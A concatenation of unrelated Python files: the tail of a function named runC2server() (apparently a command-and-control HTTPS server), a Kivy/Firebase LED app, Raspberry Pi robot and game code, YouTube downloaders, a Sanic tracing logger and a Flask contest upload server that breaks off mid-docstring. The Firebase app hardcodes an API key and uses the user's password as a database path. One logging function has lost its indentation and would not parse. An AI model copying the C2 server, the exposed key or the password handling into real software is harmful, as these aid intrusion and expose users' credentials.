    # use an explicit server-side SSLContext instead.
    context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    context.load_cert_chain(certfile='server.cert', keyfile='server.key')
    httpd.socket = context.wrap_socket(httpd.socket, server_side=True)
    print("Server Started ..!!")
    httpd.serve_forever()

runC2server()
|
import kivy
from kivy.app import App
from kivy.uix.boxlayout import BoxLayout
from kivy.lang import Builder
from kivy.uix.screenmanager import ScreenManager,Screen
from kivy.properties import ObjectProperty
from kivy.uix.button import Button
import pyrebase
import json
import requests
# Shared scratch list populated by LoginWindow.login():
# kezz[0] = password (used as the Firebase child path key in MainWindow),
# kezz[1] = the user's Wi-Fi SSID.
kezz = []
class SignupWindow(Screen):
    """Sign-up screen: creates a Firebase email/password account."""

    # Kivy properties bound to the e-mail and password inputs in rgbslider.kv
    userr = ObjectProperty(None)
    passwordi = ObjectProperty(None)
    #waka = "AIzaSyAso8HtWVAyLxTyqyj52TMO3GThdNfFXJg" #web api key

    # Firebase project configuration; class-level so LoginWindow and
    # MainWindow (subclasses) share the same auth/db handles.
    firebaseconfig = {
        "apiKey": "AIzaSyAso8HtWVAyLxTyqyj52TMO3GThdNfFXJg",
        "authDomain": "rgb-led-project.firebaseapp.com",
        "databaseURL": "https://rgb-led-project-default-rtdb.europe-west1.firebasedatabase.app",
        "projectId": "rgb-led-project",
        "storageBucket": "rgb-led-project.appspot.com",
        "messagingSenderId": "448826405701",
        "appId": "1:448826405701:web:d14e1f9732ff6ccb5e842c",
        "measurementId": "G-SBNKDMF10D"
    }
    firebase = pyrebase.initialize_app(firebaseconfig)
    auth = firebase.auth()
    db = firebase.database()

    def sign_up(self):
        """Create a Firebase user from the form fields and report the
        outcome in the signup_erra_message label."""
        email = self.userr.text
        password = self.passwordi.text
        print(email,password)
        try:
            user = self.auth.create_user_with_email_and_password(email, password)
            self.ids.signup_erra_message.text = "User Created Successfully"
        except requests.exceptions.HTTPError as error :
            #print(error)
            # pyrebase wraps the Firebase JSON error payload in args[1]
            error_message = json.loads(error.args[1])['error']['message']
            #print(error_message)
            self.ids.signup_erra_message.text = error_message
class LoginWindow(SignupWindow):
    """Login screen; also captures the Wi-Fi SSID and stashes credentials
    into the module-level `kezz` list for MainWindow.printout()."""

    wifiname = ObjectProperty(None)
    #wifipassword = ObjectProperty(None)

    def login(self):
        """Sign in via Firebase and surface success/error in the UI."""
        email = self.userr.text
        password = self.passwordi.text
        wifiname1 = self.wifiname.text
        #wifipass1 = self.wifipassword.text
        kezz.insert(1,wifiname1) #UserWifiSSID (ends up at index 1 after next insert)
        #kezz.insert(2,wifipass1) #UserWifiPassword
        kezz.insert(0,password) #to get the path token down in the main window class
        #print(email,password)
        try:
            login = self.auth.sign_in_with_email_and_password(email, password)
            self.ids.signup_erra_message1.text="Successfully logged in!"
        except requests.exceptions.HTTPError as error1:
            #print(error1)
            # pyrebase wraps the Firebase JSON error payload in args[1]
            error1_message = json.loads(error1.args[1])['error']['message']
            #print(error1_message)
            if error1_message == "EMAIL_NOT_FOUND":
                self.ids.signup_erra_message1.text= error1_message + "Press signup button"
            else:
                self.ids.signup_erra_message1.text= error1_message
class MainWindow(LoginWindow):
    """RGB slider screen: scales the slider values to 0-255 and writes
    the colour (plus the Wi-Fi SSID) to the Firebase database."""

    # Kivy properties bound to the three colour sliders (0.0 - 1.0)
    red = ObjectProperty(0.5)
    green = ObjectProperty(0.5)
    blue = ObjectProperty(0.5)
    #firebase_url = 'https://rgb-led-project-default-rtdb.europe-west1.firebasedatabase.app/.json'

    def printout(self):
        """Push {red, green, blue, SSID} under the user's token path."""
        # round each slider value to 3 decimals (as strings)
        redder = format(self.red.value , ".3f" )
        greener = format(self.green.value , ".3f" )
        bluer = format(self.blue.value , ".3f" )
        #print("e", "'"+kezz[0]+"'")
        # database child path: the login password token wrapped in quotes
        kramby = "'"+kezz[0]+"'"
        #res = isinstance(bluer, str) #the entities above are already strings
        #print("Red:", redder, "Green:", greener ,"Blue:", bluer )
        # scale back to floats in the 0-255 LED range
        redde = float(redder) * 255
        greenie = float(greener) * 255
        bluebol = float(bluer) * 255
        #print(redde,greenie,bluebol)
        json_data = {"red" : redde , "green" : greenie , "blue": bluebol, "SSID" : kezz[1]}
        self.db.child(kramby).set(json_data)
        #res = requests.put(url = self.firebase_url , json = json_data)
        #print (res)
class WindowManager(ScreenManager):
    """Container for the app's screens; layout comes from the kv file."""
    pass
# Load the UI definition; Builder returns the root widget tree.
elixir = Builder.load_file('rgbslider.kv')
#print(format(432.456, ".2f"))

class Multiple_Slider(App):
    """Main Kivy application; its root widget is the loaded kv tree."""
    def build(self):
        return elixir

if __name__ == '__main__':
    Multiple_Slider().run()
import random

# Load the occupation table once at import time; close the file handle
# promptly (the original leaked it by calling open().readlines()).
with open("data/occupations.csv", "r") as _csv_file:
    f = [x.strip("\r\n") for x in _csv_file.readlines()]
# Drop the CSV header and the final line, matching the original slicing.
# NOTE(review): f[1:-1] also discards the last row -- confirm the source
# file ends with a non-data line.
f = f[1:-1]
def parse(elem):
    """Parse one CSV row of the form OCCUPATION,PERCENT.

    The occupation may be a double-quoted field containing commas; the
    surrounding quotes are kept in the returned name.
    Returns a tuple (occupation, percent).

    Bug fix: the original never advanced past a closing quote, so any
    quoted field made the scanner re-enter the quote branch and run off
    the end of the string (IndexError).
    """
    occ = ""
    i = 0
    while i < len(elem):
        if elem[i] == '"':
            occ += elem[i]
            i += 1
            while elem[i] != '"':
                occ += elem[i]
                i += 1
            occ += '"'
            i += 1  # step over the closing quote (the original missed this)
        elif elem[i] == ",":
            i += 1
            break
        else:
            occ += elem[i]
            i += 1
    pt = float(elem[i:])
    return occ, pt
def randOcc(dict):
    """Draw one occupation from a {name: percent} weight table.

    A uniform draw in [0, 100) walks the cumulative weights; if the
    weights do not cover the draw, "Unoccupied" is returned.

    Bug fix: dict.iteritems() is Python 2 only and raises AttributeError
    on Python 3; use items() (equivalent on both).  The parameter name
    `dict` (which shadows the builtin) is kept for interface
    compatibility.
    """
    perc = random.random() * 100
    for key, val in dict.items():
        perc -= val
        if perc <= 0:
            return key
    return "Unoccupied"
def makeDict():
    """Build the {occupation: percent} table from the module-level rows."""
    return dict(parse(entry) for entry in f)
def getOcc():
    """Return a randomly drawn occupation using the CSV weight table."""
    return randOcc(makeDict())
|
# Definition for a binary tree node.
# Definition for a binary tree node.
class TreeNode(object):
    """Binary tree node whose str() is the space-joined in-order traversal.

    Bug fix: __str__ used to append into self.seqlist without clearing it
    first, so every call after the first returned a duplicated sequence.
    The buffer is now reset at the start of each __str__ call.
    """

    def __init__(self, x):
        self.val = x
        self.left = None
        self.right = None
        self.seqlist = []  # scratch buffer used by __str__/inorder

    def __str__(self):
        self.seqlist = []  # reset so repeated str() calls don't accumulate
        self.inorder(self)
        return ' '.join(str(x) for x in self.seqlist)

    def inorder(self, curr):
        """Append the in-order traversal of curr's subtree to seqlist."""
        if not curr:
            return
        self.inorder(curr.left)
        self.seqlist.append(curr.val)
        self.inorder(curr.right)
class Solution(object):
    def searchBST(self, root, val):
        """
        :type root: TreeNode
        :type val: int
        :rtype: TreeNode

        Return the subtree rooted at the node whose value equals val,
        or None when absent.

        Improvement: the original traversed the whole tree (O(n)) and
        stashed the result in a class attribute (not reentrant across
        concurrent calls).  A BST lets us descend by comparison in O(h)
        with no shared state.
        """
        node = root
        while node and node.val != val:
            node = node.left if val < node.val else node.right
        return node
if __name__ == '__main__':
    solver = Solution()
    # Sample tree:
    #        4
    #       / \
    #      2   7
    #     / \
    #    1   3
    root = TreeNode(4)
    left_child = TreeNode(2)
    right_child = TreeNode(7)
    left_child.left = TreeNode(1)
    left_child.right = TreeNode(3)
    root.left, root.right = left_child, right_child
    # Expected answer: the subtree rooted at the node holding 2.
    expected = TreeNode(2)
    expected.left = TreeNode(1)
    expected.right = TreeNode(3)
    found = solver.searchBST(root, 2)
    assert str(expected) == str(found)
import RPi.GPIO as GPIO
import time
# Use Broadcom (BCM) pin numbering for every GPIO call in this module.
GPIO.setmode(GPIO.BCM)
def setSpeed(motor, speed):
    """Set the duty cycle (0-100) of a GPIO.PWM motor channel."""
    motor.ChangeDutyCycle(speed)
def stopMotors(lmotor, rmotor):
    """Stop PWM output on both motor channels (left first, then right)."""
    for channel in (lmotor, rmotor):
        channel.stop()
def startMotors(lmotor, rmotor):
    """Start both PWM channels at 0% duty cycle (armed but not moving)."""
    for channel in (lmotor, rmotor):
        channel.start(0)
def initMotor(pwm,in1,in2, freq):
    """Configure one motor channel: two direction pins plus a PWM pin.

    freq is the PWM frequency in Hz.  The direction pins are initialised
    to forward; returns an (unstarted) GPIO.PWM object for the pwm pin.
    """
    #freq in Hz
    GPIO.setup(in1,GPIO.OUT)
    GPIO.setup(in2,GPIO.OUT)
    GPIO.setup(pwm,GPIO.OUT)
    #GPIO.output(in1,GPIO.HIGH) #forward
    #GPIO.output(in2,GPIO.LOW)
    wheelForward(in1,in2)
    return GPIO.PWM(pwm,freq)
def setFrequency(motor,freq):
    """Change the PWM frequency (Hz) of an already-created channel."""
    motor.ChangeFrequency(freq)
def turnLeft(lmotor,rmotor,speed):
    """Pivot left: left wheel stopped, right wheel at `speed`."""
    setSpeed(lmotor,0)
    setSpeed(rmotor,speed)
#    print("Left")

def turnRight(lmotor,rmotor,speed):
    """Pivot right: right wheel stopped, left wheel at `speed`."""
    setSpeed(lmotor,speed)
    setSpeed(rmotor,0)
#    print("Right")

def moveForward(lmotor,rmotor,speed):
    """Drive straight: both wheels at `speed`."""
    setSpeed(rmotor,speed)
    setSpeed(lmotor,speed)
#    print("Forward")

def veerLeft(lmotor,rmotor,speed):
    """Gentle left: left wheel slowed to 80% of `speed`."""
    setSpeed(lmotor,speed*(80/100))
    setSpeed(rmotor,speed)
#    print("VeerL")

def veerRight(lmotor,rmotor,speed):
    """Gentle right: right wheel slowed to 80% of `speed`."""
    setSpeed(rmotor,speed*(80/100))
    setSpeed(lmotor,speed)
#    print("VeerR")

def hardVeerRight(lmotor,rmotor,speed):
    """Sharper right: right wheel slowed to 75% of `speed`."""
    setSpeed(rmotor,speed*(75/100))
    setSpeed(lmotor,speed)

def hardVeerLeft(lmotor,rmotor,speed):
    """Sharper left: left wheel slowed to 75% of `speed`."""
    setSpeed(lmotor,speed*(75/100))
    setSpeed(rmotor,speed)

def turnVeerLeft(lmotor,rmotor,speed):
    """Strong left veer: left wheel slowed to 65% of `speed`."""
    setSpeed(lmotor,speed*(65/100))
    setSpeed(rmotor,speed)

def stopMoving(lmotor,rmotor):
    """Set both wheels to 0% duty cycle (coast to a stop)."""
    setSpeed(lmotor,0)
    setSpeed(rmotor,0)
def inPlaceRight(lmotor,rmotor,speed,in1,in2):
    """Spin right in place: stop the left wheel, drive the right wheel at
    `speed`, and flip the in1/in2 direction pins to reverse.

    NOTE(review): wheelBackwards reverses whichever wheel the given
    in1/in2 pins drive -- the caller must pass the matching pin pair.
    """
    setSpeed(lmotor,0)
    setSpeed(rmotor,speed)
    wheelBackwards(in1,in2)
def fullBackwards(lmotor,rmotor,speed):
    """NOTE(review): despite the name, this only stops the left wheel and
    drives the right one (identical to turnLeft); no direction pins are
    reversed -- confirm intended behaviour."""
    setSpeed(lmotor,0)
    setSpeed(rmotor,speed)

def fullForward(lmotor,rmotor,speed):
    """NOTE(review): mirrors turnRight (left wheel only); the name
    suggests both wheels should run -- confirm intended behaviour."""
    setSpeed(lmotor,speed)
    setSpeed(rmotor,0)
def wheelForward(in1,in2):
    """Drive the motor-driver direction pins for forward rotation."""
    GPIO.output(in1,GPIO.HIGH)
    GPIO.output(in2,GPIO.LOW)

def wheelBackwards(in1,in2):
    """Drive the motor-driver direction pins for reverse rotation."""
    GPIO.output(in1,GPIO.LOW)
    GPIO.output(in2,GPIO.HIGH)
|
# downloads youtube videos and (maybe) upload them to s3
from pytube import YouTube
import json
import subprocess
from multiprocessing import Pool
def downloadvid(url):
    """Download one YouTube video (360p mp4) into vids/, named by its
    video id.  Exceptions are printed and swallowed so a Pool.map over
    many URLs keeps going."""
    print("Downloading {}".format(url))
    try:
        yt = YouTube(url)
        # video id = everything after 'watch?v=' (minus any trailing '/')
        id_idx = url.find('watch?v=') + 8
        vid_id = url[id_idx:].rstrip('/')
        yt.streams.filter(mime_type='video/mp4', res='360p').first().download(output_path='vids/', filename=vid_id)
    except Exception as e:
        print("Exception while downloading {}\n{}".format(url, e))
def downloadvids_path(jsonpath):
    """Download every video listed in a JSON metadata file.

    The file must contain a JSON array of objects carrying a
    'youtube_link' key; downloads run in parallel via a process pool.
    """
    with open(jsonpath) as f:
        data = json.loads(f.read())
    urls = [e['youtube_link'] for e in data]
    print("Starting to download vids from {}".format(jsonpath))
    # Bug fix: the original printed the literal string "urls" (debug
    # leftover); print the actual URL list instead.
    print(urls)
    p = Pool()
    p.map(downloadvid, urls)
if __name__ == '__main__':
    # Download clips for 2010-2017, for both billboard and non-billboard
    # metadata files, then sync everything to S3 and reset the local
    # staging directory.
    years = range(2010, 2018)
    formats = [
        '{year}_data.json',
        '{year}_non_billboard_data.json'
    ]
    for year in years:
        for item in formats:
            fn = item.format(year=str(year))
            downloadvids_path('dataset/' + fn)
    print("Uploading to aws")
    subprocess.check_call(['aws', 's3', 'cp', 'vids', 's3://awitiks/vids', '--recursive'])
    print("Uploading finished. Deleting local vids.")
    subprocess.check_call(['rm', '-r', 'vids'])
    subprocess.check_call(['mkdir', 'vids'])
|
#!/usr/bin/python
import youtube_dl
import toolbelt
import os
import sys
import re
import hashtag
import code
import importlib
import configparser
from googleapiclient.discovery import build
from googleapiclient.errors import HttpError
#from hashtag.hashtag import HashTagger
# Module-level alias (replaces the commented-out direct import above).
HashTagger = hashtag.HashTagger
class YouTubeRipper():
    """Search YouTube, let the user curate results in vim, and download
    videos or music with youtube-dl, recording files in a hashtag DB.

    Bug fix in filter_by_file(): the original stripped a list named
    `ids` that was never defined (guaranteed NameError) and leaked the
    exclusion-file handle.
    """

    def __init__(self,
                 hashtagdbfile=os.path.expanduser('~')+"/mus/database.tag",
                 configfile=os.path.expanduser('~')+"/.config/hashtag/ripper.cfg",
                 ):
        """Open the hashtag database, read the developer key from the
        config file, and build the YouTube Data API client."""
        self.ht = HashTagger(hashtagdbfile)
        config = configparser.ConfigParser()
        config.read(configfile)
        self.developer_key = config['youtube']['developer_key']
        self.yt_api_service_name = 'youtube'
        self.yt_api_version = 'v3'
        self.youtube = build(self.yt_api_service_name,
                             self.yt_api_version,
                             developerKey=self.developer_key)

    def youtube_search(self, query, num_results):
        """Search YouTube by keyword; return [(video_id, title), ...]."""
        search_response = self.youtube.search().list(
            q=query,
            part='id,snippet',
            maxResults=num_results
        ).execute()
        videos = []
        for search_result in search_response.get('items', []):
            # skip channel/playlist results
            if search_result['id']['kind'] == 'youtube#video':
                videos.append(
                    (
                        search_result['id']['videoId'],
                        search_result['snippet']['title']
                    )
                )
        return videos

    def download_vids(self, urls):
        """Download all URLs as videos with rate-limited, resumable,
        error-tolerant youtube-dl options."""
        ydl_opts = {
            "outtmpl": "youtube_%(id)s.%(ext)s",
            "continue_dl": True,
            "ratelimit": "250000",
            "ignoreerrors": True,
            "nooverwrites": True,
            "no_check_certificate": True,
        }
        with youtube_dl.YoutubeDL(ydl_opts) as ydl:
            ydl.download(urls)

    def songs2rows(self, songs):
        """Turn 'genre/artist/title[;tag...]' strings (presumably read
        from a file) into database rows to append to the tag database."""
        songrows = []
        for song in songs:
            parts = song.split(";")
            path = parts[0]
            tags = parts[1:] if len(parts) > 1 else []
            songpart = path.split("/")
            songrow = [
                path + ".mp3",
                "genre=" + songpart[0],
                "artist=" + songpart[1],
                "title=" + songpart[2],
            ] + tags
            songrows.append(songrow)
        return songrows

    def hyphenate(self, s):
        """Collapse runs of spaces/tabs into single hyphens."""
        return re.sub("[ \t]+", "-", s)

    def dehyphenate(self, s):
        """Replace runs of hyphens with single spaces."""
        return re.sub("[\-]+", " ", s)

    def download_music(self, database):
        """For each database row, search YouTube for artist+title, let
        the user pick matches in vim, and download them as 192k mp3."""
        print(database)
        for d in database:
            path = d["id"]
            query = (self.dehyphenate(d["artist"]) + " " +
                     self.dehyphenate(d["title"]))
            videos = self.youtube_search(
                query, 10
            )
            videos = self.vim_select(videos)
            urls = self.video_urls(videos)
            ydl_opts = {
                "outtmpl": path,
                "continue_dl": True,
                "ratelimit": "250000",
                "ignoreerrors": True,
                "nooverwrites": True,
                "no_check_certificate": True,
                'format': 'bestaudio/best',
                'postprocessors': [{
                    'key': 'FFmpegExtractAudio',
                    'preferredcodec': 'mp3',
                    'preferredquality': '192',
                }]
            }
            with youtube_dl.YoutubeDL(ydl_opts) as ydl:
                ydl.download(urls)

    def video_urls(self, videos):
        """Map [(video_id, title), ...] to full watch URLs."""
        baseurl = "http://youtube.com/watch?v="
        urls = []
        for (id, title) in videos:
            urls.append(baseurl + id)
        return urls

    def vim_select(self, videos):
        """Let the user delete unwanted titles in vim; keep only videos
        whose title survives the edit."""
        titles = [video[1] for video in videos]
        titles = toolbelt.editors.vim("\n".join(titles))
        newtitles = titles.split("\n")
        newvideos = []
        for (id, title) in videos:
            if title in newtitles:
                newvideos.append((id, title))
        return newvideos

    def filter_excluded(self, videos, excluded_ids):
        """Drop videos whose IDs appear in excluded_ids (downloaded or
        banned), preserving the (id, title) tuples of the rest."""
        potential_ids = [v[0] for v in videos]
        common_ids = self.ht.intersect(excluded_ids, potential_ids)
        filtered_ids = self.ht.difference(potential_ids, common_ids)
        # Reconstruct the tuple list from the surviving IDs.
        new_videos = []
        for filtered_id in filtered_ids:
            for (video_id, title) in videos:
                if filtered_id == video_id:
                    new_videos.append((filtered_id, title))
        return new_videos

    def filter_by_file(self, videos, filename=os.path.expanduser('~')+"/vid/downloaded/excluded.txt"):
        """Drop videos whose IDs are listed (one per line) in `filename`.

        Bug fix: the original iterated an undefined name `ids` and never
        closed the file.
        """
        with open(filename) as excluded_file:
            excluded_ids = [vid.strip() for vid in excluded_file.readlines()]
        return self.filter_excluded(videos, excluded_ids)

    def filter_downloaded(self, videos, basedir=os.path.expanduser('~')+"/vid/downloaded"):
        """Drop videos already present (by filename stem) under basedir."""
        file_ids = []
        for (root, subdirs, files) in os.walk(basedir):
            for filename in files:
                file_ids.append(filename.split(".")[0])
        return self.filter_excluded(videos, file_ids)

    def music(self, songs):
        """Download one or more songs described as 'genre/artist/title'
        strings and record them in the tag database."""
        if isinstance(songs, str):
            songs = [songs]
        songrows = self.songs2rows(songs)
        musicdb = self.ht.parserows(songrows)
        self.download_music(musicdb)
        self.ht.append_entries(songrows)

    def vids(self, query, maxResults=20):
        """Search, filter out already-downloaded hits, curate in vim,
        then download the survivors as videos."""
        videos = self.youtube_search(
            query,
            maxResults
        )
        videos = self.filter_downloaded(videos)
        videos = self.vim_select(videos)
        self.download_vids(
            self.video_urls(videos)
        )
|
from django import forms
from django.contrib.auth.models import User
# (code, human-readable label) pairs for the department ChoiceField below.
dep=(
    ("CSE", "Computer Science and Engineering"),
    ("ECE", "Electronics and Communication Engineering"),
    ("MECH", "Mechanical Engineering"),
    ("EEE", "Electrical and Electronics Engineering"),
    ("MECT", "Mechatronics"),
    ("IT", "Information Technology"),
    ("CA", "Computer Application"),
    ("DS", "Data Science"),
)
class PostRegisterForm(forms.Form):
    """Plain (non model-backed) registration form for a student."""
    name = forms.CharField(max_length=20)
    regno = forms.CharField(max_length=6)  # registration number
    email = forms.EmailField()
    phone = forms.CharField(max_length=12)
    dept = forms.ChoiceField(choices = dep)
    #event = forms.ChoiceField(choices = (GEEKS_CHOICES))
|
import os
import sys
import logging
import opentracing
import datetime
import aiohttp
import time
import json
import traceback as tb
import functools
import socket
from sanic.request import Request
from basictracer.recorder import SpanRecorder
from config import utils
# Zipkin annotation skeletons: client send/receive and server send/receive.
STANDARD_ANNOTATIONS = {"client": {"cs": [], "cr": []}, "server": {"ss": [], "sr": []}}
STANDARD_ANNOTATIONS_KEYS = frozenset(STANDARD_ANNOTATIONS.keys())

# Logger every tracing decorator in this module writes through.
_logger = logging.getLogger("zipkin")
def _default_json_default(obj):
"""
Coerce everything to strings.
All objects representing time get output as ISO8601.
"""
if isinstance(obj, (datetime.datetime, datetime.date, datetime.time)):
return obj.isoformat()
else:
return str(obj)
class JsonFormatter(logging.Formatter):
    """Logging formatter that emits each record as a logstash-style JSON
    document (adds hostname, index, @version and @timestamp fields)."""

    def __init__(self, fmt=None, json_cls=None, json_default=_default_json_default):
        # `fmt`, when given, is itself a JSON string of default fields.
        if fmt is not None:
            self._fmt = json.loads(fmt)
        else:
            self._fmt = {}
        self.json_default = json_default
        self.json_cls = json_cls
        self.defaults = {}
        try:
            self.defaults["hostname"] = socket.gethostname()
        except:
            # hostname is optional metadata; ignore lookup failures
            pass

    def format(self, record):
        """Render a LogRecord as a JSON string."""
        fields = record.__dict__.copy()
        if "args" in fields and fields["args"]:
            data = fields.pop("args")
            # Edit by shady: when positional args were passed, the first
            # one (the structured log payload) replaces the whole record
            # under the "name" key.
            data = {"name": data[0]}
        else:
            data = fields
        msg = fields.pop("msg")
        if "message" not in data:
            data["message"] = msg
        # Attach exception info: prefer pre-formatted exc_text, otherwise
        # format whatever exception is currently being handled.
        exc_type, exc_value, exc_traceback = sys.exc_info()
        if "exc_text" in fields and fields["exc_text"]:
            exception = fields.pop("exc_text")
            data.update({"exception": exception})
        elif exc_type and exc_value and exc_traceback:
            formatted = tb.format_exception(exc_type, exc_value, exc_traceback)
            data.update({"exception": formatted})
        # The logger name doubles as the ES index / document type.
        name = fields["name"]
        data.update({"index": name, "document_type": name, "@version": 1})
        if "@timestamp" not in data:
            now = datetime.datetime.utcnow()
            # millisecond-precision UTC timestamp, logstash style
            timestamp = (
                now.strftime("%Y-%m-%dT%H:%M:%S")
                + ".%03d" % (now.microsecond / 1000)
                + "Z"
            )
            data.update({"@timestamp": timestamp})
        logr = self.defaults.copy()
        logr.update(data)
        return json.dumps(
            logr, default=self.json_default, cls=self.json_cls, ensure_ascii=False
        )

    def _build_fields(self, defaults, fields):
        """Return provided fields including any in defaults
        """
        return dict(list(defaults.get("@fields", {}).items()) + list(fields.items()))
def gen_span(request, name):
    """Start a child span of the request's active span and log it as a
    server-side event."""
    span = opentracing.tracer.start_span(operation_name=name, child_of=request["span"])
    span.log_kv({"event": "server"})
    return span
def logger(
    type=None,
    category=None,
    detail=None,
    description=None,
    tracing=True,
    level=logging.INFO,
    *args,
    **kwargs,
):
    """Decorator factory that logs (and optionally traces) an async callable.

    When the first positional argument of the wrapped coroutine is a Sanic
    Request and `tracing` is enabled, a child span is opened around the
    call; otherwise plain wall-clock timing is recorded.  The structured
    log dict is handed to the module logger as a positional argument
    (consumed by JsonFormatter.format).

    Bug fixes vs. the original:
    * `_logger.excepion(e)` (typo) raised AttributeError whenever logging
      itself failed;
    * `category or request.app.name if request else ""` parsed as
      `(category or request.app.name) if request else ""`, silently
      discarding an explicit `category` when no request was present;
    * `raise e` is replaced by a bare `raise` to preserve the traceback.
    """
    def decorator(fn=None):
        @functools.wraps(fn)
        async def _decorator(*args, **kwargs):
            request = (
                args[0] if len(args) > 0 and isinstance(args[0], Request) else None
            )
            log = {
                # service name
                "category": category or (request.app.name if request else ""),
                "fun_name": fn.__name__,
                # method name or the list of URLs it handles
                "detail": detail or fn.__name__,
                "log_type": type or "method",
                "description": description or (fn.__doc__ or ""),
            }
            span = None
            start_time = None
            if request and tracing:
                span = gen_span(request, fn.__name__)
            else:
                start_time = time.time()
                log.update({"start_time": start_time})
            log.update(
                {
                    "args": ",".join([str(a) for a in args])
                    if isinstance(args, (list, tuple))
                    else str(args),
                    "kwargs": kwargs.copy() if kwargs else {},
                }
            )
            try:
                exce = False
                res = await fn(*args, **kwargs)
                return res
            except Exception:
                exce = True
                raise
            finally:
                try:
                    if request and tracing:
                        span.set_tag(
                            "component",
                            "{}-{}".format(request.app.name, log["log_type"]),
                        )
                        span.finish()
                    else:
                        end_time = time.time()
                        log.update(
                            {"end_time": end_time, "duration": end_time - start_time}
                        )
                    if exce:
                        _logger.exception("{} has error".format(fn.__name__), log)
                    else:
                        _logger.info("{} is success".format(fn.__name__), log)
                except Exception as e:
                    # Bug fix: was `_logger.excepion(e)` -> AttributeError.
                    _logger.exception(e)
        _decorator.detail = detail
        _decorator.description = description
        _decorator.level = level
        return _decorator
    decorator.detail = detail
    decorator.description = description
    decorator.level = level
    return decorator
class AioReporter(SpanRecorder):
    """basictracer SpanRecorder that hands finished spans to an asyncio
    queue for asynchronous shipping."""

    def __init__(self, queue=None):
        self.queue = queue

    def record_span(self, span):
        # put_nowait: recording must never block the caller/event loop
        self.queue.put_nowait(span)
|
import RPi.GPIO as GPIO
import time
import math
#Code that plays the interesting game Cyclone.
class cycleTimer(object):
    """Repeating timer that divides a cycle of `cycleLength` seconds into
    `actionsPerCycle` equal slots and reports which slot "now" falls in."""

    def __init__(self, initTime, cycleLength, actionsPerCycle):
        self.actionTime = float(cycleLength) / float(actionsPerCycle)  # seconds per slot
        self.cycleLength = cycleLength
        self.initTime = initTime
        self.actionsPerCycle = actionsPerCycle

    def cycleNum(self):
        """Return the 0-based index of the slot the current time is in."""
        self.currentTime = time.time()
        # fractional position inside the current cycle (x % 1.0 == x - floor(x))
        self.cyclePercent = ((self.currentTime - self.initTime) / self.cycleLength) % 1.0
        self.cycleTime = self.cyclePercent * self.cycleLength
        self.cycleNumber = math.floor(self.cycleTime / self.actionTime)
        return self.cycleNumber
class risingEdge(object):
    """Detect a 0 -> 1 transition in a sampled binary signal."""

    def __init__(self):
        self.signalPast = 0

    def checkForEdge(self, signal):
        """Return True exactly when `signal` is one greater than the
        previous sample (i.e. a rising edge); always remember the sample."""
        self.signal = signal
        rose = (signal - self.signalPast == 1)
        self.signalPast = signal
        return rose
# Hardware setup: one button input and a ring of seven LEDs (BCM numbering).
GPIO.setmode(GPIO.BCM)
buttonInput=12
ledNumbers=(18,20,21,22,23,24,25)
GPIO.setup(buttonInput, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
GPIO.setup(ledNumbers, GPIO.OUT)
cycleLength=2
# Sweep one lit LED around the ring every `cycleLength` seconds.
Timer1=cycleTimer(time.time(), cycleLength,len(ledNumbers))
checkEdge=risingEdge()
try:
    while True:
        whichLED=Timer1.cycleNum()
        offLEDs=[x for x in ledNumbers if x != ledNumbers[whichLED]] #List Comprehension
        GPIO.output(offLEDs, GPIO.LOW)
        GPIO.output(ledNumbers[whichLED], GPIO.HIGH)
        # Button pressed (rising edge): a win only counts while LED #4 is lit.
        if(checkEdge.checkForEdge(GPIO.input(buttonInput)) == 1):
            print("hell ya")
            time.sleep(.01)
            if whichLED == 4:
                GPIO.output(ledNumbers, GPIO.LOW)
                break
    # Victory buzzer: run PWM on pin 22 until half of a 12-second cycle passes.
    timer2=cycleTimer(time.time(), 12,2)
    GPIO.cleanup()
    GPIO.setmode(GPIO.BCM)
    GPIO.setup(22, GPIO.OUT)
    pwm = GPIO.PWM(22, 100)
    pwm.start(25)
    while timer2.cycleNum()<1:
        pass #pass does nothing, but python requires a place holder in this instance
except: #This ensures every GPIO Pin is turned off after exit
    GPIO.cleanup()
    raise
GPIO.cleanup()
|
from flask import Flask, json, request, jsonify, redirect, url_for
from flask_cors import CORS
from pymongo import MongoClient
from name_ge import NameGenerator
from verify_file import verify_file
import os
import uuid
import config
import datetime
app = Flask(__name__)
app.config['JSON_AS_ASCII'] = False  # allow non-ASCII characters in JSON responses
CORS(app)
cfg = config.Config()
UPLOAD_PATH = cfg.local_path + '/scripts'
ALLOWED_EXTENSIONS = {'py'}  # only Python scripts may be uploaded
app.config['UPLOAD_FOLDER'] = UPLOAD_PATH
# Bug fix: the original used `with MongoClient(...) as conn:` at module
# scope, which closes the client as soon as the with-block ends -- every
# later request handler would then operate on a closed connection.  Keep
# the client open for the lifetime of the process instead.
conn = MongoClient(cfg.db_path)
db = conn[cfg.db_name]
ng = NameGenerator()
@app.route("/")
def hello():
return "Hello World!"
@app.route('/users')
def get_users():
users = db['users']
l = list(users.find({}))
candidates = list()
na_candidates = list()
for doc in l:
if doc["joinedTeam"] is None:
candidates.append(doc['name'])
else:
na_candidates.append(doc['name'])
return jsonify({"candidates": candidates, "naCandidates": na_candidates})
@app.route('/teamName')
def get_team_name():
    """Suggest a randomly generated team name."""
    x = ng.generate()
    return jsonify({"name": x})
@app.route('/teamLogs/<path:teamName>')
def get_log_by_team(teamName):
    """Return the submission log entries (status, upload time, uid) for
    one team."""
    docs = db['logs'].find({"teamName": teamName})
    result = list()
    for doc in docs:
        t = dict()
        t['status'] = doc['status']
        # Bug fix: the original format '%Y%m%d - %h%m%s' mixed up strftime
        # codes (%h = abbreviated month, %m = month, %s = epoch seconds);
        # use the hour/minute/second codes for the time part.
        t['uploadTime'] = doc['uploadTime'].strftime('%Y%m%d - %H:%M:%S')
        t['uid'] = doc['uid']
        result.append(t)
    return jsonify({"data": result})
@app.route("/joinTeam", methods=['POST'])
def regist_team():
team_info = json.loads(request.data)
uid = uuid.uuid1()
r = {
"name": team_info["teamName"],
"users": team_info["users"],
"submissions": [],
"highestScore": [0, 0, 0, 0],
"matchInfo": [],
"rank": {
"low": None,
"med": None,
"high": None,
"rand": None
},
"uid": uid
}
db['teams'].insert_one(r)
for u in team_info["users"]:
db["users"].find_one_and_update({"name": u}, {"$set": {"joinedTeam": r["name"]}})
return jsonify({"status": "OK", "uid": uid})
## upload scripts api
def allowed_file(filename):
    """Accept only filenames that carry an allowed extension (.py)."""
    if '.' not in filename:
        return False
    extension = filename.rsplit('.', 1)[1].lower()
    return extension in ALLOWED_EXTENSIONS
@app.route('/upload', methods=['POST'])
def upload_file():
    """Accept a team's .py submission, verify it, and record the outcome.

